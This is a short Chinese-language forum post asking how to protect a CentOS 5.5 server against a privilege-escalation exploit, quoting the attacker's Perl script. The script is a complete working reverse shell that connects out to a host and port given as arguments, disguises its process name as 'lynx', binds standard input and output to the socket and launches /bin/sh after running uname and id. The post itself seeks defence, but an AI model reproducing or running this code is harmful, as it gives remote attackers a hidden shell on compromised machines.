- 论坛徽章:
- 0
|
求指点centos5.5 exp版本 提权 如何防护?
导出脚本代码如:- #!/usr/bin/perl
- use Socket;
- $cmd= "lynx";
- $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
- $0=$cmd;
- $target=$ARGV[0];
- $port=$ARGV[1];
- $iaddr=inet_aton($target) || die("Error: $!\n");
- $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
- $proto=getprotobyname('tcp');
- socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
- connect(SOCKET, $paddr) || die("Error: $!\n");
- open(STDIN, ">&SOCKET");
- open(STDOUT, ">&SOCKET");
- open(STDERR, ">&SOCKET");
- system($system);
- close(STDIN);
- close(STDOUT);
- close(STDERR);
复制代码 |
|